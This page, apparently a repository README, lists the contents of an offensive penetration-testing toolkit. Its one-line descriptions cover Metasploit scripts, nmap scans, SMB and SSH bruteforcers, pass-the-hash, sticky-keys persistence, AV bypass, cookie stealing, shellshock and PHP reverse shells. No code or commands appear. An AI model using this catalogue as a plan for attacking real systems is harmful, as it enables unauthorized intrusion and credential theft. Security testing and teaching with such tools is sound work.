Tools

pentesting_tools

Yuriy Stanchev - Penetration testing tools. For educational purposes only, use at your own responsibility.

Structure

Here are some comon scripts - for full list check the repository. Please edit as suitable for your needs. As a start for rc scripts set iPs and change ports if needed.
Check the repository Penetration Testing Tools
metasploit_rc_scripts - contains either sample rc files for explatation or perls to generate such.
|- aurora.rc - exploatation of Aurora vulnerability
|- autoroute.rc - Autorouting example.
|- aux_scan.rc - port scanning.
|- av* - AV bypass
|- bind* - Bind payloads
|- browser-* - Browser payloads
|- dir_list.rc - http directory listing
|- http_nix.pl - nix http exploit bruteforcer
|- iis.pl - iis exploit bruteforcer
|- java
 - Java payloads

|- mimi.rc - mimikatz stuff
|- nessus.rc - load nessus scan results for further exploatation, if in doubt list the reports first and then edit and execute.
|- nessus_db_init.sh - initialize postgres for usage with metasploit
|- netapi_smb.pl - Generates NetAPI rc to bruteforce vulnerabilities.
|- pdf* - PDF payloads
|- persistance-sticky.rc - persistance through sticky keys
|- priv* - Windows Priveledge Escalation Techniques
|- psexec.rc - psexe with passing the hash
|- rc_revphp.rc - PHP reverse handler
|- rdp_ena.rc - enable rdp
|- relay_port.rc - relay a port
|- reverse_rc - meterpreter reverse handler
|- smb_enum* - Windows SMB enumeration scripts
|- smb_psexec* - Windows SMB bruteforce and psexec
|- smb_relay* - SMB relay attack.
|- smb_win_brute.pl - Windows SMB bruteforce
|- spool.rc - MS10-061 - microsoft spool service vlnerability
|- ssh* - SSH rc scripts
|- stage__inclusion - PHP file inclusion scripts
|- svc_priv_
 - Windows Service Priviledge Escalation

|- samba-nix.pl - Linux Samba vulnerabilities bruteforcer
|- ms10_046.rc - browser shorcut icon exploatation
|- telnet.rc - telnet bruteforce
|- win_post.rc - windows post exploatation
|- wpnix.pl - worpress exploit bruteforcer
nmap_scans - is for some ready to use nmap scannings.
|- discover_hosts.sh - basic host diwcovery
|- netenum.sh - a bit more extended host discovery and basic tests
|- nfs_ls.sh - nfs list
|- nmap.sh - various standart scans
|- nmap_ftp_scan.sh - test ftp nse scripts
|- nmap_http_scan.sh - http vulnerabilities
|- nmap_http_scan_proxy.sh - same scan trough a proxy on the target. Customize for Burp and OWASP ZAP.
|- nmap_mssql_scan.sh - nse checks on MS SQL
|- nmap_mysql_scan.sh - nse checks on MySQL
|- nmap_smb_scan.sh - nse checks on Windows, enum4linux, b\nbtscan, nmblookup
|- nmap_smtp_scan.sh - nse checks for smtp
|- osfingerprint.sh - SYN, service version and OS scan
|- static_nmap.sh - staticly compile nmap
other_scans - scripts that can be used for scanning if nothing else is availible.
|- afhn_ping_tr.sh - trace, arping, fping, hping, nping, ping
|- brute_ssh_telnet.sh - telnet, ssh bruteforcer - modify as needed.
|- http_scan.sh - various http scan, modify as needed
|- http_scan_proxy.sh - same trough proxy on the target
|- hydra_form_brute.sh - as the name says
|- nc_scan.sh - port scan with nc
|- ping.sh - range ping
|- ping_scan.bat - same on windows
|- pingscan.ps1 - same with powershell
|- sql_map.sh - guided union based query injection
|- unicorns_amap.sh - unicorn and amap port scan
post - is for post exploatation.
|- access.sh - check access logs
|- addusr.bat - add a local and domain user
|- all_info.bat - gather info for priveledge escalation
|- badsql.sh - Exploatation of MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22
|- get_description_ad.ps1 - account description
|- netview.bat - list domains, domain users, admin etc.
|- windows-post-exploitation.sh - pass the hash post exploatation
privilege_escalation- some documents and tools on priviledge escalation
research_exploits - some windows exploits
shellshock - is a script to get use of the shellshock vulnarability.
|- bind_shellshock - open a bind shell
|- read_file_shellshock - read a fle
|- reverse_shellshock - reverse shell
|- reverse_shellshock_proxy - reverse shell trough proxy on the target
tools - are other tools.
|- arp* - arp poisoning
|- dns* - dns enumerators
|- cookie* - cookie stealing
|- curdir.php.txt - get current directory
|- dir.php.txt - list /
|- passwd.php.txt - read passwd
|- php-reverse-shell* - pentester monkey php reverse shell in php, txt for RFI and gif
|- dirtr_tool.pl - Simple Directory Traversal Tool
|- harvester.pl - harvesting
|- snmpwalk.pl - snmp enumeration
|- venomous.pl - different tests to bypass AVs with msfvenom
|- win_kracks.pl - call ncrack for rdp on multiple hosts
|- write_file.txt - PHP write file examples

If any questions please ask at iuri.stanchev@gmail.com

No comments:

Post a Comment